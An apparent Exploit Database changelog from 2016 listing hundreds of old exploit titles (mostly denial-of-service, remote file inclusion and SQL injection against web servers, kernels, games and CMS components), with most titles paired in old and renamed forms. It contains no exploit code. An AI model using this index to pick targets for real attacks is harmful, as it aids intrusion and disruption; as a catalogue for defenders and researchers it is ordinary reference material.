DB: 2016-08-18

4 new exploits

Apache 2.0.44 (Linux) - Remote Denial of Service Exploit
Apache 2.0.44 (Linux) - Remote Denial of Service
Chindi Server 1.0 - Denial of Service Exploit
Chindi Server 1.0 - Denial of Service
Xeneo Web Server 2.2.9.0 - Denial of Service Exploit
Xeneo Web Server 2.2.9.0 - Denial of Service
Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit
Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service
Cisco IOS - IPv4 Packets Denial of Service Exploit
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit
Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit
Cisco IOS - (using hping) Remote Denial of Service Exploit
Cisco IOS - IPv4 Packets Denial of Service
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service
Microsoft Windows 2000 - RPC DCOM Interface Denial of Service
Cisco IOS - (using hping) Remote Denial of Service
Linux Kernel 2.4.20 - decode_fh Denial of Service Exploit
Linux Kernel 2.4.20 - decode_fh Denial of Service
Trillian 0.74 - Remote Denial of Service Exploit
Trillian 0.74 - Remote Denial of Service
Piolet Client 1.05 - Remote Denial of Service Exploit
Piolet Client 1.05 - Remote Denial of Service
Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)
Microsoft Windows Messenger Service - Denial of Service (MS03-043)
wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit
wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service
Eznet 3.5.0 - Remote Stack Overflow / Denial of Service Exploit
Eznet 3.5.0 - Remote Stack Overflow / Denial of Service
Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit
Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service
Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)
Microsoft Windows IIS - SSL Remote Denial of Service (MS04-011)
Microsoft Windows - 'Jolt2.c' Denial of Service Exploit
Microsoft Windows - 'Jolt2.c' Denial of Service
ProFTPD 1.2.0pre10 - Remote Denial of Service Exploit
ProFTPD 1.2.0pre10 - Remote Denial of Service
APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit
APC UPS 3.7.2 - (apcupsd) Local Denial of Service
Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit
Novell BorderManager Enterprise Edition 3.5 - Denial of Service
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service Exploit
Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service
Emule 0.42e Remote Denial of Service Exploit
Emule 0.42e Remote Denial of Service
Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local DoS Exploit
Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service
Ping of Death Remote Denial of Service Exploit
Ping of Death Remote Denial of Service
Microsoft Windows NT Crash with an Extra Long Username DoS Exploit
Microsoft Windows NT Crash with an Extra Long Username Denial of Service
TCP SYN - 'bang.c' Denial of Service Exploit
UDP Stress Tester Denial of Service Exploit
TCP SYN - 'bang.c' Denial of Service
UDP Stress Tester Denial of Service
OverByte ICS FTP Server Remote Denial of Service Exploit
OverByte ICS FTP Server Remote Denial of Service
Xitami Web Server Denial of Service Exploit
Xitami Web Server Denial of Service
Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)
Microsoft Windows SMS 2.0 - Denial of Service Exploit
Microsoft Internet Explorer - Denial of Service (11 bytes)
Microsoft Windows SMS 2.0 - Denial of Service
Citadel/UX Remote Denial of Service Exploit (PoC)
Citadel/UX Remote Denial of Service (PoC)
psyBNC 2.3 - Denial of Service Exploit
psyBNC 2.3 - Denial of Service
Microsoft Messenger - Denial of Service Exploit (MS03-043) (Linux)
Microsoft Messenger - Denial of Service (MS03-043) (Linux)
BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit
BadBlue 2.52 Web Server - Multiple Connections Denial of Service
Painkiller 1.3.1 - Denial of Service Exploit
Easy File Sharing Webserver 1.25 - Denial of Service Exploit
Painkiller 1.3.1 - Denial of Service
Easy File Sharing Webserver 1.25 - Denial of Service
WFTPD Pro Server 3.21 MLST Remote Denial of Service Exploit
CesarFTP Server Long Command Denial of Service Exploit
Ground Control 1.0.0.7 - (Server/Client) Denial of Service Exploit
WFTPD Pro Server 3.21 MLST Remote Denial of Service
CesarFTP Server Long Command Denial of Service
Ground Control 1.0.0.7 - (Server/Client) Denial of Service
Call of Duty 1.4 - Denial of Service Exploit
Call of Duty 1.4 - Denial of Service
Serv-U < 5.2 - Remote Denial of Service Exploit
Serv-U < 5.2 - Remote Denial of Service
Pigeon Server 3.02.0143 - Denial of Service Exploit
Pigeon Server 3.02.0143 - Denial of Service
Emulive Server4 7560 - Remote Denial of Service Exploit
Emulive Server4 7560 - Remote Denial of Service
PopMessenger 1.60 - Remote Denial of Service Exploit
PopMessenger 1.60 - Remote Denial of Service
MyServer 0.7.1 - (POST) Denial of Service Exploit
MyServer 0.7.1 - (POST) Denial of Service
MSSQL 7.0 - Remote Denial of Service Exploit
MSSQL 7.0 - Remote Denial of Service
Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)
Microsoft Windows NNTP Service (XPAT) Denial of Service (MS04-036)
Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)
Microsoft Windows IIS - WebDAV XML Denial of Service (MS04-030)
BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit
BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service
BaSoMail - Multiple Buffer Overflow Denial of Service Exploit
BaSoMail - Multiple Buffer Overflow Denial of Service
Master of Orion III 1.2.5 - Denial of Service Exploit
Master of Orion III 1.2.5 - Denial of Service
Alpha Black Zero 1.04 - Remote Denial of Service Exploit
Alpha Black Zero 1.04 - Remote Denial of Service
Flash Messaging 5.2.0g - Remote Denial of Service Exploit
Flash Messaging 5.2.0g - Remote Denial of Service
WinFTP Server 1.6 - Denial of Service Exploit
Kerio Personal Firewall 4.1.1 - Multiple IP Options DoS Exploit
WinFTP Server 1.6 - Denial of Service
Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service
NetNote Server 2.2 build 230 - Crafted String DoS Exploit
NetNote Server 2.2 build 230 - Crafted String Denial of Service
Secure Network Messenger 1.4.2 - Denial of Service Exploit
Secure Network Messenger 1.4.2 - Denial of Service
Soldier of Fortune II 1.3 Server/Client - Denial of Service Exploit
Soldier of Fortune II 1.3 Server/Client - Denial of Service
Star Wars Battlefront 1.1 - Fake Players Denial of Service Exploit
Star Wars Battlefront 1.1 - Fake Players Denial of Service
3Dmax 6.x backburner Manager 2.2 - Denial of Service Exploit
3Dmax 6.x backburner Manager 2.2 - Denial of Service
Jana Server 2.4.4 - (http/pna) Denial of Service Exploit
Jana Server 2.4.4 - (http/pna) Denial of Service
Neverwinter Nights special Fake Players Denial of Service Exploit
Kreed 1.05 - Format String / Denial of Service Exploit
Neverwinter Nights special Fake Players Denial of Service
Kreed 1.05 - Format String / Denial of Service
Codename Eagle 1.42 - Socket Unreacheable DoS Exploit
Codename Eagle 1.42 - Socket Unreacheable Denial of Service
Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit
Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit
Linux Kernel 2.4.28 / 2.6.9 - scm_send Local Denial of Service
Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service
SOLDNER Secret Wars 30830 - Denial of Service Exploit
SOLDNER Secret Wars 30830 - Denial of Service
iWebNegar 1.1 - Configuration Nullification Denial of Service Exploit
iWebNegar 1.1 - Configuration Nullification Denial of Service
Gore 1.50 - Socket Unreacheable Denial of Service Exploit
Gore 1.50 - Socket Unreacheable Denial of Service
TinyWeb 1.9 - Denial of Service Exploit
TinyWeb 1.9 - Denial of Service
ngIRCd 0.8.1 - Remote Denial of Service Exploit (2)
ngIRCd 0.8.1 - Remote Denial of Service (2)
Foxmail 2.0 - (MAIL FROM:) Denial of Service Exploit
Foxmail 2.0 - (MAIL FROM:) Denial of Service
Mac OS X AppleFileServer Remote Denial of Service Exploit
Mac OS X AppleFileServer Remote Denial of Service
webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service Exploit
webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service
wu-ftpd 2.6.2 - File Globbing Denial of Service Exploit
Knet 1.04c - Buffer Overflow Denial of Service Exploit
wu-ftpd 2.6.2 - File Globbing Denial of Service
Knet 1.04c - Buffer Overflow Denial of Service
Scrapland 1.0 - Server Termination Denial of Service Exploit
Scrapland 1.0 - Server Termination Denial of Service
Apache 2.0.52 - HTTP GET request Denial of Service Exploit
Apache 2.0.52 - HTTP GET request Denial of Service
Microsoft Windows 2003/XP - Remote Denial of Service Exploit
Microsoft Windows 2003/XP - Remote Denial of Service
OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit
OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service
Freeciv Server 2.0.0beta8 - Denial of Service Exploit
Freeciv Server 2.0.0beta8 - Denial of Service
PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Exploit
MailEnable 1.8 - Remote Format String Denial of Service Exploit
phpDEV5 - System-Call Local Denial of Service Exploit
PlatinumFTP 1.0.18 - Multiple Remote Denial of Service
MailEnable 1.8 - Remote Format String Denial of Service
phpDEV5 - System-Call Local Denial of Service
MCPWS Personal WebServer 1.3.21 - Denial of Service Exploit
MCPWS Personal WebServer 1.3.21 - Denial of Service
Ocean FTP Server 1.00 - Denial of Service Exploit
Ocean FTP Server 1.00 - Denial of Service
SPECTral Personal SMTP Server 0.4.2 - Denial of Service Exploit
SPECTral Personal SMTP Server 0.4.2 - Denial of Service
Linux Kernel 2.6.10 - Local Denial of Service Exploit
Linux Kernel 2.6.10 - Local Denial of Service
ArGoSoft FTP Server 1.4.2.8 - Denial of Service Exploit
ArGoSoft FTP Server 1.4.2.8 - Denial of Service
Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service Exploit
Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service
MailEnable Enterprise 1.x - SMTP Remote Denial of Service Exploit
MailEnable Enterprise 1.x - SMTP Remote Denial of Service
Yager 5.24 - Multiple Denial of Service Exploit
Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019)
Yager 5.24 - Multiple Denial of Service
Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)
PostgreSQL 8.01 - Remote Reboot Denial of Service Exploit
PostgreSQL 8.01 - Remote Reboot Denial of Service
Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit
Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service
Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service Exploit
Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Exploit
Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Exploit
Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop DoS Exploit
Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service
Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service
Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service
Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop Denial of Service
Ashley's Web Server Denial of Service Exploit
Ashley's Web Server Denial of Service
DataTrac Activity Console Denial of Service Exploit
Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service Exploit
DataTrac Activity Console Denial of Service
Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service
Remote File Manager 1.0 - Denial of Service Exploit
Remote File Manager 1.0 - Denial of Service
Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit
Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service
Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit
Microsoft Windows 2003/XP - IPv6 Remote Denial of Service
TCP TIMESTAMPS Denial of Service Exploit
TCP TIMESTAMPS Denial of Service
FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit
FutureSoft TFTP Server 2000 - Remote Denial of Service
Tcpdump bgp_update_print Remote Denial of Service Exploit
Tcpdump bgp_update_print Remote Denial of Service
TCP-IP Datalook 1.3 - Local Denial of Service Exploit
TCP-IP Datalook 1.3 - Local Denial of Service
UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit
UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection Exploit
TCP Chat (TCPX) 1.0 - Denial of Service Exploit
TCP Chat (TCPX) 1.0 - Denial of Service
PrivaShare 1.3 - Denial of Service Exploit
AnalogX SimpleServer:WWW 1.05 - Denial of Service Exploit
PrivaShare 1.3 - Denial of Service
AnalogX SimpleServer:WWW 1.05 - Denial of Service
Remote File Explorer 1.0 - Denial of Service Exploit
wMailServer 1.0 - Remote Denial of Service Exploit
Remote File Explorer 1.0 - Denial of Service
wMailServer 1.0 - Remote Denial of Service
Microsoft Windows Netman Service Local Denial of Service Exploit
NetPanzer 0.8 - Remote Denial of Service Exploit
Microsoft Windows Netman Service Local Denial of Service
NetPanzer 0.8 - Remote Denial of Service
Remote Control Server 1.6.2 - Denial of Service Exploit
Remote Control Server 1.6.2 - Denial of Service
DzSoft PHP Editor 3.1.2.8 - Denial of Service Exploit
DzSoft PHP Editor 3.1.2.8 - Denial of Service
Intruder Client 1.00 - Remote Command Execution & DoS Exploit
Intruder Client 1.00 - Remote Command Execution & Denial of Service
FTPshell Server 3.38 - Remote Denial of Service Exploit
FTPshell Server 3.38 - Remote Denial of Service
BusinessMail Server 4.60.00 - Remote Denial of Service Exploit
BusinessMail Server 4.60.00 - Remote Denial of Service
Quick 'n EasY 3.0 FTP Server Remote Denial of Service Exploit
Quick 'n EasY 3.0 FTP Server Remote Denial of Service
Acunetix HTTP Sniffer - Denial of Service Exploit
Acunetix HTTP Sniffer - Denial of Service
Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel DoS Exploit
Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel Denial of Service
Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit
Grandstream Budge Tone 101/102 VOIP Phone Denial of Service
Chris Moneymakers World Poker Championship 1.0 DoS Exploit
GTChat 0.95 Alpha - Remote Denial of Service Exploit
Chris Moneymakers World Poker Championship 1.0 Denial of Service
GTChat 0.95 Alpha - Remote Denial of Service
GoodTech SMTP Server 5.14 - Denial of Service Exploit
IA eMailServer Corporate Edition 5.2.2 - DoS Exploit
GoodTech SMTP Server 5.14 - Denial of Service
IA eMailServer Corporate Edition 5.2.2 - Denial of Service
GTChat 0.95 Alpha - (adduser) Remote Denial of Service Exploit
Ventrilo 2.3.0 - Remote Denial of Service Exploit (all platforms)
GTChat 0.95 Alpha - (adduser) Remote Denial of Service
Ventrilo 2.3.0 - Remote Denial of Service (all platforms)
Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit
Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service
P2P Pro 1.0 - (command) Denial of Service Exploit
P2P Pro 1.0 - (command) Denial of Service
CUPS Server 1.1 - (Get Request) Denial of Service Exploit
CUPS Server 1.1 - (Get Request) Denial of Service
BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service Exploit
BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service
COOL! Remote Control 1.12 - Remote Denial of Service Exploit
Snort 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit
COOL! Remote Control 1.12 - Remote Denial of Service
Snort 2.4.0 SACK TCP Option Error Handling Denial of Service
Stoney FTPd Denial of Service Exploit (rxBot mods ftpd)
Stoney FTPd Denial of Service (rxBot mods ftpd)
Fastream NETFile Web Server 7.1.2 - (HEAD) DoS Exploit
Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service
MCCS (Multi-Computer Control Systems) Command DoS Exploit
MCCS (Multi-Computer Control Systems) Command Denial of Service
Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service Exploit
Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service
Virtools Web Player 3.0.0.100 - Buffer Overflow DoS Exploit
Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service
RBExplorer 1.0 - (Hijacking Command) Denial of Service Exploit
RBExplorer 1.0 - (Hijacking Command) Denial of Service
Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) Denial of Service Exploit
Opera 8.02 - Remote Denial of Service Exploit (1)
Opera 8.02 - Remote Denial of Service Exploit (2)
Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) Denial of Service
Opera 8.02 - Remote Denial of Service (1)
Opera 8.02 - Remote Denial of Service (2)
Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) Denial of Service Exploit
Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) Denial of Service
Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)
Microsoft Windows Plug-and-Play (Umpnpmgr.dll) Denial of Service (MS05-047)
Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)
Microsoft Windows Plug-and-Play (Umpnpmgr.dll) Denial of Service (MS05-047) (2)
Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service Exploit
Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service
Battle Carry .005 Socket Termination Denial of Service Exploit
Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Exploit
FlatFrag 0.3 - Buffer Overflow / Denial of Service Exploit
Battle Carry .005 Socket Termination Denial of Service
Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service
FlatFrag 0.3 - Buffer Overflow / Denial of Service
Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit
Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service
Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service Exploit
Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service
Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit
FreeFTPD 1.0.10 - (PORT Command) Denial of Service Exploit
Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service
FreeFTPD 1.0.10 - (PORT Command) Denial of Service
Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)
Xaraya 1.0.0 RC4 - create() Denial of Service Exploit
Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)
Microsoft Windows Metafile (gdi32.dll) Denial of Service (MS05-053)
Xaraya 1.0.0 RC4 - create() Denial of Service
Microsoft Windows Metafile - (mtNoObjects) Denial of Service (MS05-053)
SugarSuite Open Source 4.0beta Remote Code Execution Exploit
SugarSuite Open Source 4.0beta - Remote Code Execution Exploit
Macromedia Flash Media Server 2 - Remote Denial of Service Exploit
Macromedia Flash Media Server 2 - Remote Denial of Service
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (Perl)
Microsoft Windows IIS - Malformed HTTP Request Denial of Service
Microsoft Windows IIS - Malformed HTTP Request Denial of Service (Perl)
BZFlag 2.0.4 - (undelimited string) Denial of Service Exploit
BZFlag 2.0.4 - (undelimited string) Denial of Service
Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Exploit
Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service
Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)
Microsoft Windows IIS - Malformed HTTP Request Denial of Service (cpp)
BlueCoat WinProxy 6.0 R1c (GET Request) Denial of Service Exploit
BlueCoat WinProxy 6.0 R1c (GET Request) Denial of Service
Cisco IP Phone 7940 - (Reboot) Denial of Service Exploit
Cisco IP Phone 7940 - (Reboot) Denial of Service
Cerberus FTP Server 2.32 - Denial of Service Exploit
Cerberus FTP Server 2.32 - Denial of Service
Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit
Arescom NetDSL-1000 - (telnetd) Remote Denial of Service
Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit
Sony/Ericsson Bluetooth (Reset Display) Denial of Service
Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service Exploit
Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service
Invision Power Board 2.1.4 - (Register Users) Denial of Service Exploit
Invision Power Board 2.1.4 - (Register Users) Denial of Service
D-Link Wireless Access Point (Fragmented UDP) DoS Exploit
D-Link Wireless Access Point (Fragmented UDP) Denial of Service
PunBB 2.0.10 - (Register Multiple Users) Denial of Service Exploit
PunBB 2.0.10 - (Register Multiple Users) Denial of Service
Lansuite 2.1.0 Beta (fid) SQL Injection Exploit
Lansuite 2.1.0 Beta - (fid) SQL Injection Exploit
FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit
FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service
LieroX 0.62b Remote Server/Client Denial of Service Exploit
LieroX 0.62b Remote Server/Client Denial of Service
Guppy 4.5.11 - (Delete Databases) Remote Denial of Service Exploit
Guppy 4.5.11 - (Delete Databases) Remote Denial of Service
Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service Exploit
Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service
Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007)
Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007)
Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)
Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)
Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit
csDoom 0.7 - Multiple Vulnerabilities/Denial of Service Exploit
Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service
csDoom 0.7 - Multiple Vulnerabilities/Denial of Service
Plogger Beta 2.1 Administrative Credentials Disclosure Exploit
Plogger Beta 2.1 - Administrative Credentials Disclosure Exploit
Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit
Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service
Neon Responder 5.4 - (Clock Synchronization) Denial of Service Exploit
Neon Responder 5.4 - (Clock Synchronization) Denial of Service
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service
OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit
OCE 3121/3122 Printer (parser.exe) Denial of Service
phpMyAgenda 3.0 Final - (rootagenda) Remote Include
phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion
Empire 4.3.2 - (strncat) Denial of Service Exploit
Genecys 0.2 - (BoF/NULL pointer) Denial of Service Exploit
Empire 4.3.2 - (strncat) Denial of Service
Genecys 0.2 - (BoF/NULL pointer) Denial of Service
GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit
GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service
Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service Exploit
phpBazar 2.1.0 - Remote File Include / Auth Bypass
Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service
phpBazar 2.1.0 - Remote File Inclusion / Auth Bypass
portmap 5 beta (Set/Dump) Local Denial of Service Exploit
portmap 5 beta - (Set/Dump) Local Denial of Service
Back-End CMS 0.7.2.2 - (BE_config.php) Remote Include
Back-End CMS 0.7.2.2 - (BE_config.php) Remote File Inclusion
tinyBB 0.3 - Remote File Include / SQL Injection
tinyBB 0.3 -Remote File Inclusion / SQL Injection
F@cile Interactive Web 0.8x - Remote File Include / XSS
F@cile Interactive Web 0.8x - Remote File Inclusion / XSS
PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions
PHP-Nuke 7.9 Final - (phpbb_root_path) Remote File Inclusions
LifeType 1.0.4 - Multiple Vulnerabilities
LifeType 1.0.4 - SQL Injection
Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include
Back-End CMS 0.7.2.1 - (jpcache.php) Remote File Inclusion
Opera Web Browser 9.00 - (iframe) Remote Denial of Service Exploit
Opera Web Browser 9.00 - (iframe) Remote Denial of Service
ImgSvr 0.6.5 - (long http post) Denial of Service Exploit
ImgSvr 0.6.5 - (long http post) Denial of Service
SimpleBoard Mambo Component 1.1.0 - Remote Include
com_forum Mambo Component 1.2.4RC3 - Remote Include
SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion
com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion
com_videodb Mambo Component 0.3en Remote Include
com_videodb Mambo Component 0.3en Remote File Inclusion
HTMLArea3 Mambo Module 1.5 - Remote Include
Sitemap Mambo Component 2.0.0 - Remote Include
pollxt Mambo Component 1.22.07 - Remote Include
HTMLArea3 Mambo Module 1.5 - Remote File Inclusion
Sitemap Mambo Component 2.0.0 - Remote File Inclusion
pollxt Mambo Component 1.22.07 - Remote File Inclusion
D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)
D-Link Router UPNP Stack Overflow Denial of Service (PoC)
MoSpray Mambo Component 18RC1 - Remote Include
ArticlesOne 07232006 - (page) Remote Include
Mam-Moodle Mambo Component alpha Remote Inclusion
MoSpray Mambo Component 18RC1 - Remote File Inclusion
ArticlesOne 07232006 - (page) Remote File Inclusion
Mam-Moodle Mambo Component alpha - Remote Inclusion
Mambo User Home Pages Component 0.5 - Remote Include
Mambo User Home Pages Component 0.5 - Remote File Inclusion
Joomla LMO Component 1.0b2 - Remote Include
Joomla LMO Component 1.0b2 - Remote File Inclusion
SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote Include
XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)
Joomla JD-Wiki Component 1.0.2 - Remote Include
SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion
XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)
Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion
phpCC 4.2 beta (base_dir) Remote File Inclusion
phpCC 4.2 beta - (base_dir) Remote File Inclusion
Visual Events Calendar 1.1 - (cfg_dir) Remote Include
Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion
XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)
XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)
See-Commerce 1.0.625 - (owimg.php3) Remote Include
PocketPC Mms Composer (WAPPush) Denial of Service Exploit
See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion
PocketPC Mms Composer (WAPPush) Denial of Service
Mambo Remository Component 3.25 - Remote Include
Mambo Remository Component 3.25 - Remote File Inclusion
Joomla Webring Component 1.0 - Remote Include
Joomla Webring Component 1.0 - Remote File Inclusion
Opera 9 - IRC Client Remote Denial of Service Exploit
Opera 9 IRC Client - Remote Denial of Service Exploit (Python)
Opera 9 - IRC Client Remote Denial of Service
Opera 9 IRC Client - Remote Denial of Service (Python)
Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC
Microsoft Windows PNG File IHDR Block Denial of Service PoC
Mambo CopperminePhotoGalery Component Remote Include
Mambo CopperminePhotoGalery Component Remote File Inclusion
WTcom 0.2.4-alpha (torrents.php) SQL Injection
WTcom 0.2.4-alpha - (torrents.php) SQL Injection
Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (1)
Microsoft Windows - PNG File IHDR Block Denial of Service PoC (1)
Joomla Artlinks Component 1.0b4 - Remote Include
Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (2)
PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote Include
Joomla Artlinks Component 1.0b4 - Remote File Inclusion
Microsoft Windows - PNG File IHDR Block Denial of Service PoC (2)
PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion
Mambo MamboWiki Component 0.9.6 - Remote Include
Joomla Link Directory Component 1.0.3 - Remote Include
Mambo MamboWiki Component 0.9.6 - Remote File Inclusion
Joomla Link Directory Component 1.0.3 - Remote File Inclusion
PHlyMail Lite 3.4.4 - (folderprops.php) Remote Include (2)
PHlyMail Lite 3.4.4 - (folderprops.php) Remote File Inclusion (2)
Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service Exploit
Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service
2Wire Modems/Routers CRLF - Denial of Service Exploit
2Wire Modems/Routers CRLF - Denial of Service
Integramod Portal 2.x - (functions_portal.php) Remote Include Exploit
VistaBB 2.x - (functions_mod_user.php) Remote Include Exploit
Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion Exploit
VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion Exploit
phpCOIN 1.2.3 - (session_set.php) Remote Include
phpCOIN 1.2.3 - (session_set.php) Remote File Inclusion
Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote Include
Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion
PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote Include
PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion
Web Server Creator 0.1 - (l) Remote Include
Web Server Creator 0.1 - (l) Remote File Inclusion
Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service Exploit
Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service
mcGalleryPRO 2006 - (path_to_folder) Remote Include
